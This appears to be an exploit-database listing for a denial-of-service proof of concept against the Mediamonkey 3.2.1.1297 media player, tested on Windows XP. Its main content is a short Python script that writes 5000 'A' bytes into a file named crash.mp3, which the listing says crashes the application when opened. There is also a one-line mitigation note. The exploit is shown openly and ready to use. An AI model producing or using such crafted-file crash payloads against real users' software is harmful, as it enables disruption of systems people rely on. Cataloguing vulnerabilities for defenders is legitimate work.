header-logo
Suggest Exploit
vendor:
Mediamonkey
by:
N/A
7,5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: Mediamonkey
Affected Version From: 3.2.1.1297
Affected Version To: 3.2.1.1297
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2/3
N/A

Mediamonkey v. 3.2.1.1297 DOS POC

This exploit is a proof of concept for a Denial of Service (DoS) vulnerability in Mediamonkey v. 3.2.1.1297. The vulnerability is triggered when a specially crafted MP3 file is opened, causing the application to crash. The vulnerable application can be found at http://www.mediamonkey.com/trialpay and the exploit has been tested on Windows XP SP2/3.

Mitigation:

The user should avoid opening untrusted MP3 files.
Source

Exploit-DB raw data:

#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3

#!/usr/bin/python

filename = "crash.mp3"


junk = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()

Navigation

Suggest Exploit

Services By CQR